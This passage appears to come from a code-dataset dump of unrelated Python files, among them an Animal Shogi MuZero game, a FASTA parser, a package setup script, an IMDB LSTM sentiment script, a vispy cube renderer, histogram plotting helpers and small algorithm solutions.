except:\n pass\n print(\"Wrong input, try again\")\n\n move = Move(from_board, from_stock, to_board, 0)\n if self.is_legal(move) and move.from_board is not None:\n m2 = move.clone()\n m2.promotion = 1\n if self.is_legal(m2):\n pr_str = input(\"Promotion? [Y]/[n]: \").lower()\n if pr_str != \"n\":\n move.promotion = 1\n if self.is_legal(move):\n break\n else:\n print(\"Illegal Move, try again\")\n return move.encode_to_action_index()\n\n def expert_action(self):\n best_actions, _ = self.search_moves(self.clone(), 2, self.to_play())\n return numpy.random.choice(best_actions)\n\n def search_moves(self, state, search_depth: int, for_player: int):\n \"\"\"\n :param AnimalShogi state:\n :param search_depth:\n :param for_player:\n :return:\n \"\"\"\n action_results = {}\n\n for action in state.legal_actions():\n s = state.clone()\n _, reward, done = s.step(action)\n if done or search_depth == 0:\n action_results[action] = reward\n else:\n _, best_reward = self.search_moves(\n s, search_depth-1, for_player)\n action_results[action] = -best_reward * 0.99\n\n best_reward = numpy.max(list(action_results.values()))\n best_actions = [a for a, r in action_results.items()\n if r == best_reward]\n return best_actions, best_reward\n\n def render(self):\n chars = {\n 0: \" \",\n L1: P1_COLOR + \"🐯\" + RESET,\n E1: P1_COLOR + \"🐘\" + RESET,\n G1: P1_COLOR + \"🐴\" + RESET,\n P1: P1_COLOR + \"🐥\" + RESET,\n C1: P1_COLOR + \"🐔\" + RESET,\n L2: P2_COLOR + \"🐯\" + RESET,\n E2: P2_COLOR + \"🐘\" + RESET,\n G2: P2_COLOR + \"🐴\" + RESET,\n P2: P2_COLOR + \"🐥\" + RESET,\n C2: P2_COLOR + \"🐔\" + RESET,\n }\n lines = []\n for line in self.board:\n line_ch_list = []\n for kind in line:\n line_ch_list.append(chars[kind])\n lines.append(\"\".join(line_ch_list))\n\n stock_lines = []\n for stocks in self.stocks:\n stock = \"\"\n for i, num in enumerate(stocks):\n stock += \"🐘🐴🐥\"[i] * num\n stock_lines.append(stock)\n\n print(P2_COLOR + f\"stock: {stock_lines[1]}\" + RESET)\n print(\" | 1 2 3|\")\n print(\"-+------+-\")\n print(\"\\n\".join([f\"{m}|{line}|\" for m, line in zip(\"abcd\", lines)]))\n print(\"-+------+-\")\n 
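`search_moves` above is a small negamax: each child position is scored from the opponent's point of view and negated, and the `* 0.99` factor decays values with depth so the agent prefers the fastest win and the slowest loss. The same recursion in isolation, with the hypothetical `legal` and `apply_move` callables standing in for the game API:

```python
def negamax(state, depth, legal, apply_move):
    """Return (best_actions, best_value) for the side to move."""
    scored = {}
    for a in legal(state):
        child, reward, done = apply_move(state, a)
        if done or depth == 0:
            scored[a] = reward
        else:
            _, child_best = negamax(child, depth - 1, legal, apply_move)
            scored[a] = -child_best * 0.99  # opponent's best, decayed
    best = max(scored.values())
    return [a for a, v in scored.items() if v == best], best
```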
print(P1_COLOR + f\"stock: {stock_lines[0]}\" + RESET)\n\n def action_to_string(self, action_number):\n move = Move.decode_from_action_index(action_number)\n if move.from_board is not None:\n from_pos, to_pos = move.from_pos(), move.to_pos()\n kind = self.board[to_pos]\n if kind == 0:\n ch = \" \"\n else:\n ch = \"🐯🐘🐴🐥🐔\"[(kind-1) % 5]\n pos_from = \"123\"[from_pos[1]] + \"abcd\"[from_pos[0]]\n pos_to = \"123\"[to_pos[1]] + \"abcd\"[to_pos[0]]\n return f\"{pos_from}{pos_to}{ch}\"\n else:\n to_pos = move.to_pos()\n pos_to = \"123\"[to_pos[1]] + \"abcd\"[to_pos[0]]\n ch = \"🐘🐴🐥\"[move.from_stock]\n return f\"->{pos_to}{ch}\"\n\n\n# first player\nL1 = 1 # Lion\nE1 = 2 # Elephant\nG1 = 3 # Giraph\nP1 = 4 # Chick (Piyo Piyo! or Pawn)\nC1 = 5 # Chicken\n\n# second player\nL2 = 6\nE2 = 7\nG2 = 8\nP2 = 9\nC2 = 10\n\n# move direction\nUL = (-1, -1) # Y, X\nUU = (-1, 0)\nUR = (-1, 1)\nML = (0, -1)\nMR = (0, 1)\nDL = (1, -1)\nDD = (1, 0)\nDR = (1, 1)\n\nALLOWED_MOVES = {\n L1: [UL, UU, UR, ML, MR, DL, DD, DR],\n L2: [UL, UU, UR, ML, MR, DL, DD, DR],\n E1: [UL, UR, DL, DR],\n E2: [UL, UR, DL, DR],\n G1: [UU, ML, MR, DD],\n G2: [UU, ML, MR, DD],\n P1: [UU],\n P2: [DD],\n C1: [UL, UU, UR, ML, MR, DD],\n C2: [DL, DD, DR, ML, MR, UU],\n}\n\n\nclass AnimalShogiNetwork(MuZeroResidualNetwork):\n def get_action_channel_size(self):\n return 6\n\n def encode_hidden_and_action(self, encoded_state, action):\n \"\"\"\n\n :param encoded_state: [batch, ch, Height, Width]\n :param action: [batch, 1]\n :return:\n \"\"\"\n channels = self.encode_action(encoded_state.shape, action)\n return torch.cat([encoded_state] + channels, dim=1)\n\n @staticmethod\n def encode_action(shape, action):\n \"\"\"\n\n :param shape: tuple(batch, ch, h, w)\n :param action: [batch, 1]\n\n >>> sh = (2, 8, 4, 3)\n >>> moves = [Move(5, None, 0, 1), Move(None, 1, 11, 0)]\n >>> action = torch.tensor([[m.encode_to_action_index()] for m in moves])\n >>> channels = torch.cat(AnimalShogiNetwork.encode_action(sh, action), dim=1)\n >>> channels.shape\n torch.Size([2, 6, 4, 3])\n >>> assert channels[0, 0, 1, 2] == 1. 
# From\n        >>> assert torch.sum(channels[0, 0, :, :]) == 1\n        >>> assert torch.sum(channels[0, 1:4, :, :]) == 0  # Stocks\n        >>> assert channels[0, 4, 0, 0] == 1  # To\n        >>> assert torch.sum(channels[0, 4, :, :]) == 1  # To\n        >>> assert torch.sum(channels[0, 5, :, :]) == 12  # Promotion\n        >>> #\n        >>> assert torch.sum(channels[1, 0, :, :]) == 0  # From Board\n        >>> assert torch.sum(channels[1, 1, :, :]) == 0  # Stock\n        >>> assert torch.sum(channels[1, 2, :, :]) == 12\n        >>> assert torch.sum(channels[1, 3, :, :]) == 0\n        >>> assert channels[1, 4, 3, 2] == 1  # To\n        >>> assert torch.sum(channels[1, 4, :, :]) == 1\n        >>> assert torch.sum(channels[1, 5, :, :]) == 0  # Promotion\n        \"\"\"\n        def ones(i):\n            sh = shape[0], i, shape[2], shape[3]\n            return torch.ones(sh).to(action.device).float()\n\n        def zeros(i):\n            sh = shape[0], i, shape[2], shape[3]\n            return torch.zeros(sh).to(action.device).float()\n\n        board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n        promote = action % 2\n        action //= 2\n        to_board = (action % board_size).long().squeeze(1)\n        action //= board_size\n        minus_1 = torch.tensor(-1).to(action.device)\n        from_board = torch.where(\n            action < board_size, action.long(), minus_1).long().squeeze(1)\n        from_stock = torch.where(\n            action < board_size, minus_1, (action-board_size).long()).long().squeeze(1)\n\n        channels = []\n        indexes = torch.arange(len(action)).long()\n        # From\n        from_ch = zeros(1)\n        from_ch[indexes, :, from_board // BOARD_SIZE_X, from_board % BOARD_SIZE_X] = (\n            torch.where(from_board >= 0., torch.Tensor(\n                [1.]), torch.Tensor([0.]))[:, None].float()\n        )\n        channels.append(from_ch)\n        # Stock\n        stocks = zeros(CAPTURABLE_KIND_NUM)\n        stocks[indexes, from_stock, :, :] = torch.where(\n            from_stock >= 0., torch.Tensor(\n                [1.]), torch.Tensor([0.]))[:, None, None].float()\n        channels.append(stocks)\n        # To\n        to_ch = zeros(1)\n        to_ch[indexes, :, to_board // BOARD_SIZE_X,\n              to_board % BOARD_SIZE_X] = 1.\n        channels.append(to_ch)\n        # promote\n        channels.append(ones(1) * promote[:, :, None, None])\n        return channels\n\n\nif __name__ == \"__main__\":\n    game = Game()\n    game.reset()\n    while True:\n        game.render()\n        action = game.expert_agent()\n        _, r, done = game.step(action)\n        print(f\"Player{game.to_play()}: {game.action_to_string(action)}\")\n        if done:\n            print(f\"reward: {r}, done\")\n            break\n","sub_path":"muzero/games/animal_shogi.py","file_name":"animal_shogi.py","file_ext":"py","file_size_in_byte":28027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"585639148","text":"import os\nimport re\nimport matplotlib.pyplot as plt\n\n\n\nclass FastaParser(object):\n    \"\"\" Fasta parser that takes path/to/fastafile as input \"\"\"\n    def __init__(self, in_path):\n        \"\"\" Check input and parse information in fasta file\"\"\"\n        \n        if not os.path.exists(in_path):\n            raise IOError(\"No such file...\")\n        \n        self.in_path = open(in_path)\n        self.fasta = re.split(\"^>\", self.in_path.read(), flags=re.MULTILINE)\n        self.entries = []\n        for entry in self.fasta[1:]:\n            header, seq = entry.split(\"\\n\", 1)\n            self.entries.append([header, seq.replace(\"\\n\", \"\")])\n        self.count = len(self.entries)\n    \n    def __len__(self):\n        \"\"\"return nr of entries\"\"\"\n        return len(self.entries)\n    \n    def __getitem__(self, index):\n        \"\"\"Makes entries available by both index and key\"\"\"\n        if type(index) == int:\n            # integer lookup returns the [header, sequence] entry\n            return self.entries[index]\n        else:\n            key = \"\"\n            for entry in self.entries:\n                if entry[0] == index:\n                    key = entry[1]\n            if key:\n                return key\n            else:\n                raise KeyError(\"no such entry\")\n    \n    
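# helper methods: extract_length filters entries by length, length_dist plots the distribution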
def extract_length(self,length):\n \"\"\" Takes int as argument and returns all entries where len(seq) < int\"\"\"\n try:\n int(length)\n except:\n raise TypeError(\"Needed a number\")\n filter = []\n for entry in self.entries:\n if len(entry[1]) < length:\n filter.append(entry)\n return filter\n \n def length_dist(self, out_path):\n \"\"\"Takes a path as argument and create a pdf at that part with a length\n distribution of the entries\"\"\"\n new_path = out_path.replace(\"~\", os.environ[\"HOME\"])\n \n if not os.path.exists(new_path[:new_path.rfind(\"/\")]): \n os.mkdir(new_path[:new_path.rfind(\"/\")+1])\n \n lens = {}\n for entry in self.entries:\n entry_len = len(entry[1])\n if entry_len in lens:\n lens[entry_len] += 1\n else:\n lens[entry_len] = 1\n \n plt.bar([key for key in lens], [lens[key] for key in lens])\n plt.savefig(new_path, facecolor='w', frameon = False)\n return","sub_path":"Day5/fasta_parser.py","file_name":"fasta_parser.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226092560","text":"from setuptools import setup, find_packages \n \nwith open('requirements.txt') as f: \n requirements = f.readlines() \n \nlong_description = 'Given a vcf file, produces a tidy versions of sites and genotypes data, in \\\n efforts to make it easier to calculate summary statitics and visualizations.' \n \nsetup( \n name ='tidy_vcf', \n version ='0.1.2.3', \n author ='Silas Tittes', \n author_email ='silas.tittes@gmail.com', \n url ='https://github.com/silastittes/tidy_vcf', \n description ='Make tidy VCF data.', \n long_description = long_description, \n long_description_content_type =\"text/markdown\", \n license ='MIT', \n packages = find_packages(), \n entry_points ={ \n 'console_scripts': [ \n 'tidy_vcf = tidy_vcf.tidy_vcf:main'\n ] \n }, \n classifiers =( \n \"Programming Language :: Python :: 3\", \n \"License :: OSI Approved :: MIT License\", \n \"Operating System :: OS Independent\", \n ), \n keywords ='VCF genetics python package', \n install_requires = requirements, \n zip_safe = False,\n python_requires='>=3.6'\n) \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436351933","text":"\n# @Title: 两两交换链表中的节点 (Swap Nodes in Pairs)\n# @Author: allan.wanglz@qq.com\n# @Date: 2020-06-18 22:24:18\n# @Runtime: 44 ms\n# @Memory: 13.7 MB\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n before_head = ListNode(next=head)\n pt = before_head\n while pt.next and pt.next.next:\n self.swapAdj(pt, pt.next, pt.next.next.next)\n pt = pt.next.next\n return before_head.next\n \n @staticmethod\n def swapAdj(left, start, right):\n end = start.next\n left.next = end\n start.next = right\n end.next = start\n","sub_path":"Problemset/swap-nodes-in-pairs/swap-nodes-in-pairs.py","file_name":"swap-nodes-in-pairs.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205319175","text":"import nltk\nfrom nltk import word_tokenize\nfrom nltk.util import ngrams\n\nimport numpy\nimport random\nimport tensorflow as tf\nfrom keras.preprocessing import 
sequence\n\nnumpy.random.seed(7)\ntf.set_random_seed(7)\n\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Activation\nfrom keras.layers import Embedding\n\n# Just to ensure\nnumpy.random.seed(7)\ntf.set_random_seed(7)\n\n\ndef convert_to_trigrams(in_set, out_set):\n new_in = []\n new_out = []\n for x, y in zip(in_set, out_set):\n tg = list(ngrams(x, 3))\n nx = []\n for t in tg:\n if t in tg_dict:\n nx.append(tg_dict[t])\n if len(nx) > 0:\n new_in.append(nx)\n new_out.append(int(y))\n return new_in, new_out\n\ndef convert_to_trigrams_and_bigrams(in_set, out_set):\n new_in = []\n new_out = []\n for x, y in zip(in_set, out_set):\n tg = list(ngrams(x, 3))\n tg.extend(list(ngrams(x, 2)))\n nx = []\n for t in tg:\n if t in tg_dict:\n nx.append(tg_dict[t])\n if len(nx) > 0:\n new_in.append(nx)\n new_out.append(int(y))\n return new_in, new_out\n\n\ndef fitLength(arr, m_length):\n for i in range(len(arr)):\n l = len(arr[i]) - 1\n while len(arr[i]) < m_length:\n arr[i].append(arr[i][random.randint(0, l)]) # different elements can be used to increase length\n if len(arr[i]) > m_length:\n arr[i] = arr[i][:m_length] # here some different methods can be applied (sorting, etc.)\n\n\nprint(\"Loading IMDB data...\")\nmax_features = 1000\n(X_train, y_train), (X_test, y_test) = imdb.load_data(seed=113)\nprint(\"IMDB data loaded.\")\n\nprint(\"Creating trigrams bow...\")\ntrigrams_bow = []\nfor x in X_train:\n trigrams_bow.extend(list(ngrams(x, 3)))\n\nprint(\"Creating bigrams bow...\")\nbigrams_bow = []\nfor x in X_train:\n bigrams_bow.extend(list(ngrams(x, 2)))\n\nprint(\"Creating trigram bow finished.\")\nprint(\"Calculating frequency distribution for trigrams...\")\nfdist_tri = nltk.FreqDist(trigrams_bow)\nlen(fdist_tri)\n\nprint(\"Calculating frequency distribution for bigrams...\")\nfdist_bi = nltk.FreqDist(bigrams_bow)\nlen(fdist_bi)\n\nprint(\"Creating trigrams dictionary...\")\ntg_dict = {}\ndict_size = 500\ncount = 0\nfor tg, freq in fdist_tri.most_common(dict_size):\n tg_dict[tg] = count\n count += 1\n\nfor tg, freq in fdist_bi.most_common(dict_size):\n tg_dict[tg] = count\n count += 1\n\nprint(\"Dictionary created.\")\n\nprint(\"Converting IMDB data to trigrams...\")\nx_train_tg, y_train_tg = convert_to_trigrams_and_bigrams(X_train, y_train)\nx_test_tg, y_test_tg = convert_to_trigrams_and_bigrams(X_test, y_test)\nprint(\"IMDB converted.\")\n\nprint(\"Reviews length distribution:\")\nimport matplotlib.pyplot as plt\n\nreview_length = []\nfor x in range(0, len(x_train_tg)):\n review_length.append(len(x_train_tg[x]))\n\nplt.figure(1)\nplt.plot(review_length)\n\nplt.figure(2)\nplt.plot(review_length)\nplt.axis([0, 5000, 0, 200])\n\nplt.show()\n\nmax_review_length = 300\nprint(\"Matching reviews length to \", max_review_length, \"...\")\n# x_train_tg = sequence.pad_sequences(x_train_tg, maxlen = max_review_length, value=x_train_tg[0][0])\n# x_test_tg = sequence.pad_sequences(x_test_tg, maxlen = max_review_length, value=x_test_tg[0][0])\n\nfitLength(x_train_tg, max_review_length)\nfitLength(x_test_tg, max_review_length)\nprint(\"Matching finished.\")\n\nprint(\"Creating model...\")\nmodel = Sequential()\nembedding_vector_length = 32\nlstm_output_space = 50 # parameter to change\nmodel.add(Embedding(max_features, embedding_vector_length, input_length=max_review_length))\nmodel.add(LSTM(lstm_output_space, dropout_W=0.2, 
dropout_U=0.2))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nprint(\"Compiling model...\")\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\nprint(model.summary())\n\nprint(\"Fitting model...\")\nhistory = model.fit(x_train_tg, y_train_tg, epochs=15, batch_size=32)\n\nprint(\"Calculating model accuracy...\")\nmodel_score = model.evaluate(x_test_tg, y_test_tg, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (model_score[1] * 100))","sub_path":"trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485586269","text":"\nfrom os import path\nimport numpy as np\nfrom vispy import app, gloo\nfrom vispy.util.transforms import perspective, translate, rotate\nfrom vispy.io import load_data_file, read_mesh, load_crate\n\nVERT_COLOR_CODE = \"\"\"\n// Uniforms\n// ------------------------------------\nuniform mat4 u_model;\nuniform mat4 u_view;\nuniform mat4 u_projection;\nuniform vec4 u_color;\n\n// Attributes\n// ------------------------------------\nattribute vec3 a_position;\nattribute vec4 a_color;\nattribute vec3 a_normal;\n\n// Varying\n// ------------------------------------\nvarying vec4 v_color;\n\nvoid main()\n{\n v_color = u_color;\n gl_Position = u_projection * u_view * u_model * vec4(a_position,1.0);\n}\n\"\"\"\n\n\nFRAG_COLOR_CODE = \"\"\"\n// Varying\n// ------------------------------------\nvarying vec4 v_color;\n\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\nVERT_TEX_CODE = \"\"\"\nuniform mat4 u_model;\nuniform mat4 u_view;\nuniform mat4 u_projection;\n\nattribute vec3 a_position;\nattribute vec2 a_texcoord;\n\nvarying vec2 v_texcoord;\n\nvoid main()\n{\n v_texcoord = a_texcoord;\n gl_Position = u_projection * u_view * u_model * vec4(a_position,1.0);\n}\n\"\"\"\n\n\nFRAG_TEX_CODE = \"\"\"\nuniform sampler2D u_texture;\nvarying vec2 v_texcoord;\n\nvoid main()\n{\n float ty = v_texcoord.y;\n float tx = sin(ty*50.0)*0.01 + v_texcoord.x;\n gl_FragColor = texture2D(u_texture, vec2(tx, ty));\n}\n\"\"\"\n\n\n\nclass Canvas(app.Canvas):\n\n def __init__(self):\n app.Canvas.__init__(self, keys='interactive', size=(800, 600))\n\n dirname = path.join(path.abspath(path.curdir),'data')\n positions, faces, normals, texcoords = \\\n read_mesh(load_data_file('cube.obj', directory=dirname))\n\n self.filled_buf = gloo.IndexBuffer(faces)\n\n if False:\n self.program = gloo.Program(VERT_TEX_CODE, FRAG_TEX_CODE)\n self.program['a_position'] = gloo.VertexBuffer(positions)\n self.program['a_texcoord'] = gloo.VertexBuffer(texcoords)\n self.program['u_texture'] = gloo.Texture2D(load_crate())\n else:\n self.program = gloo.Program(VERT_COLOR_CODE, FRAG_COLOR_CODE)\n self.program['a_position'] = gloo.VertexBuffer(positions)\n self.program['u_color'] = 1, 0, 0, 1\n\n self.view = translate((0, 0, -5))\n self.model = np.eye(4, dtype=np.float32)\n\n gloo.set_viewport(0, 0, self.physical_size[0], self.physical_size[1])\n self.projection = perspective(45.0, self.size[0] /\n float(self.size[1]), 2.0, 10.0)\n\n self.program['u_projection'] = self.projection\n\n self.program['u_model'] = self.model\n self.program['u_view'] = self.view\n\n self.theta = 0\n self.phi = 0\n\n gloo.set_clear_color('gray')\n gloo.set_state('opaque')\n gloo.set_polygon_offset(1, 1)\n\n self._timer = app.Timer('auto', connect=self.on_timer, start=True)\n\n self.show()\n\n # ---------------------------------\n def on_timer(self, event):\n self.theta += .5\n self.phi 
+= .5\n self.model = np.dot(rotate(self.theta, (0, 1, 0)),\n rotate(self.phi, (0, 0, 1)))\n self.program['u_model'] = self.model\n self.update()\n\n # ---------------------------------\n def on_resize(self, event):\n gloo.set_viewport(0, 0, event.physical_size[0], event.physical_size[1])\n self.projection = perspective(45.0, event.size[0] /\n float(event.size[1]), 2.0, 10.0)\n self.program['u_projection'] = self.projection\n\n # ---------------------------------\n def on_draw(self, event):\n gloo.clear()\n\n # Filled cube\n\n gloo.set_state(blend=False, depth_test=True, polygon_offset_fill=True)\n self.program.draw('triangles', self.filled_buf)\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n c = Canvas()\n app.run()\n","sub_path":"examples/scratch/objloader.py","file_name":"objloader.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"474618529","text":"import logging\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\n\nlog = logging.getLogger(__name__)\n\n\ndef _total_yield_uncertainty(sumw2_list):\n \"\"\"calculate the absolute statistical uncertainty of a stack of MC\n via sum in quadrature\n\n Args:\n sumw2_list (list): list of absolute stat. uncertainty per sample\n\n Returns:\n np.array: absolute stat. uncertainty of stack of samples\n \"\"\"\n tot_unc = np.sqrt(np.sum(np.power(sumw2_list, 2), axis=0))\n return tot_unc\n\n\ndef data_MC_matplotlib(histogram_dict_list, figure_path):\n \"\"\"draw a data/MC histogram with matplotlib\n\n Args:\n histogram_dict_list (list[dict]): list of samples (with info stored in one dict per sample)\n figure_path (pathlib.Path): path where figure should be saved\n \"\"\"\n mc_histograms_yields = []\n mc_histograms_sumw2 = []\n mc_labels = []\n for h in histogram_dict_list:\n if h[\"isData\"]:\n data_histogram_yields = h[\"hist\"][\"yields\"]\n data_histogram_sumw2 = h[\"hist\"][\"sumw2\"]\n data_label = h[\"label\"]\n else:\n mc_histograms_yields.append(h[\"hist\"][\"yields\"])\n mc_histograms_sumw2.append(h[\"hist\"][\"sumw2\"])\n mc_labels.append(h[\"label\"])\n\n # get the highest single bin from the sum of MC\n y_max = np.max(\n np.sum(\n [h[\"hist\"][\"yields\"] for h in histogram_dict_list if not h[\"isData\"]],\n axis=0,\n )\n )\n\n # if data is higher in any bin, the maximum y axis range should take that into account\n y_max = max(\n y_max, np.max([h[\"hist\"][\"yields\"] for h in histogram_dict_list if h[\"isData\"]])\n )\n\n mpl.style.use(\"seaborn-colorblind\")\n\n # plot MC stacked together\n total_yield = np.zeros_like(mc_histograms_yields[0])\n bins = histogram_dict_list[0][\"hist\"][\"bins\"]\n bin_right_edges = bins[1:]\n bin_left_edges = bins[:-1]\n bin_width = bin_right_edges - bin_left_edges\n bin_centers = 0.5 * (bin_left_edges + bin_right_edges)\n for i_sample, mc_sample_yield in enumerate(mc_histograms_yields):\n plt.bar(\n bin_centers,\n mc_sample_yield,\n width=bin_width,\n bottom=total_yield,\n label=mc_labels[i_sample],\n )\n total_yield += mc_sample_yield\n\n # add total MC uncertainty\n mc_stack_unc = _total_yield_uncertainty(mc_histograms_sumw2)\n plt.bar(\n bin_centers,\n 2 * mc_stack_unc,\n width=bin_width,\n bottom=total_yield - mc_stack_unc,\n label=\"Stat. 
uncertainty\",\n fill=False,\n linewidth=0,\n edgecolor=\"gray\",\n hatch=3 * \"/\",\n )\n\n # plot data\n plt.errorbar(\n bin_centers,\n data_histogram_yields,\n yerr=data_histogram_sumw2,\n fmt=\"o\",\n c=\"k\",\n label=data_label,\n )\n\n plt.legend(frameon=False)\n plt.xlabel(histogram_dict_list[0][\"variable\"])\n plt.ylabel(\"events\")\n plt.xlim(bin_left_edges[0], bin_right_edges[-1])\n plt.ylim([0, y_max * 1.1]) # 10% headroom\n plt.plot()\n\n if not os.path.exists(figure_path.parent):\n os.mkdir(figure_path.parent)\n log.debug(\"saving figure as %s\", figure_path)\n plt.savefig(figure_path)\n plt.clf()\n","sub_path":"src/cabinetry/contrib/histogram_drawing.py","file_name":"histogram_drawing.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75195386","text":"from django.conf.urls import url, include\n\nurlpatterns = [\n url(r'^$', 'blog.views.home', name='home'),\n url(r'^archive/$', 'blog.views.archive', name='archive'),\n url(r'^view/(?P[^\\.]+).html$', 'blog.views.post', name='post'),\n url(r'^search/', include('haystack.urls')),\n url(r'^login/$', 'blog.views.login', name='login'),\n url(r'^logout/$', 'blog.views.logout', name='logout'),\n url(r'^edit/(?P[^\\.]+).html$', 'blog.views.edit', name='edit'),\n url(r'^save/$', 'blog.views.save', name='save'),\n url(r'^delete/(?P[^\\.]+).html$', 'blog.views.delete', name='delete'),\n url(r'^toggle_publish/(?P[^\\.]+).html$', 'blog.views.toggle_publish', name='toggle_publish'),\n url(r'^create/$', 'blog.views.create', name='create'),\n url(r'^manage/$', 'blog.views.manage', name='manage'),\n]\n","sub_path":"src/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79690823","text":"class Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n num_expect = target - nums[i]\n if num_expect in nums[i + 1:]:\n print([i, nums.index(num_expect, i+1)])\n return [i, nums.index(num_expect, i+1)]\n\n\nSolution().twoSum([3, 5, 4, 1, 4], 9)\n","sub_path":"algorithm/array/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309429300","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 4 12:46:14 2017\n\n@author: vinnam\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\nfile_path1 = \"./result/brain_hoo_10D_BSLBO_UCB_yscaled.npy\"\nfile_path2 = \"./result/brain_hoo_10D_REMBO_UCB_yscaled.npy\"\n\nBSLBO = np.load(file_path1)\nREMBO = np.load(file_path2)\n\noptimum = -0.397887\n\nBSLBO = optimum - BSLBO\nREMBO = optimum - REMBO\n\nBSLBO_ln = np.log10(BSLBO)\nREMBO_ln = np.log10(REMBO)\n\nx = np.arange(1, 501)\nplt.fill_between(x, np.average(BSLBO_ln, axis = 1) - np.sqrt(np.var(BSLBO_ln, axis = 1)), np.average(BSLBO_ln, axis = 1) + np.sqrt(np.var(BSLBO_ln, axis = 1)), color = 'blue', alpha = 0.5)\nplt.plot(x, np.average(BSLBO_ln, axis = 1), 'b-')\n\nplt.fill_between(x, np.average(REMBO_ln, axis = 1) - np.sqrt(np.var(REMBO_ln, axis = 1)), np.average(REMBO_ln, axis = 1) + np.sqrt(np.var(REMBO_ln, axis = 1)), color = 'yellow', alpha = 0.5)\nplt.plot(x, np.average(REMBO_ln, axis = 1), 'g-')\n\nBSLBO_regret = np.zeros_like(BSLBO)\nREMBO_regret = 
np.zeros_like(REMBO)\n\nfor i in xrange(BSLBO_regret.shape[0]):\n    BSLBO_regret[i, :] = np.min(BSLBO[0:(i+1), :], axis = 0)\n    \nfor i in xrange(REMBO_regret.shape[0]):\n    REMBO_regret[i, :] = np.min(REMBO[0:(i+1), :], axis = 0)\n    \nBSLBO_regret_ln = np.log10(BSLBO_regret)\nREMBO_regret_ln = np.log10(REMBO_regret)\n\nfig = plt.figure()\n\nplt.fill_between(x, np.average(BSLBO_regret_ln, axis = 1) - np.sqrt(np.var(BSLBO_regret_ln, axis = 1)), np.average(BSLBO_regret_ln, axis = 1) + np.sqrt(np.var(BSLBO_regret_ln, axis = 1)), color = 'blue', alpha = 0.5)\nplt.plot(x, np.average(BSLBO_regret_ln, axis = 1), 'b-')\nplt.fill_between(x, np.average(REMBO_regret_ln, axis = 1) - np.sqrt(np.var(REMBO_regret_ln, axis = 1)), np.average(REMBO_regret_ln, axis = 1) + np.sqrt(np.var(REMBO_regret_ln, axis = 1)), color = 'yellow', alpha = 0.5)\nplt.plot(x, np.average(REMBO_regret_ln, axis = 1), color = 'yellow')\n\nfig.savefig('Brainin_10D.png', dpi = 1000)\n\nfig = plt.figure()\n\nfor i in xrange(BSLBO_regret_ln.shape[1]):\n    ax1 = plt.subplot(4,5,i+1)\n    ax1.plot(BSLBO_regret_ln[:, i])\n    ax1.set_ylim([np.min(BSLBO_regret_ln), np.max(BSLBO_regret_ln)])\n    \nfig.savefig('BSLBO_regret.png', dpi = 1000)\n\nfig = plt.figure()\n\nfor i in xrange(REMBO_regret_ln.shape[1]):\n    ax2 = plt.subplot(4,5,i+1)\n    ax2.plot(REMBO_regret_ln[:, i])\n    ax2.set_ylim([np.min(REMBO_regret_ln), np.max(REMBO_regret_ln)])\n\nfig.savefig('REMBO_regret.png', dpi = 1000)\n\nplt.figure()\nfor i in xrange(REMBO_regret_ln.shape[1]):\n    plt.plot(x, REMBO_regret_ln[:, i], 'y')\n    plt.plot(x, BSLBO_regret_ln[:, i], 'b')\n\n","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
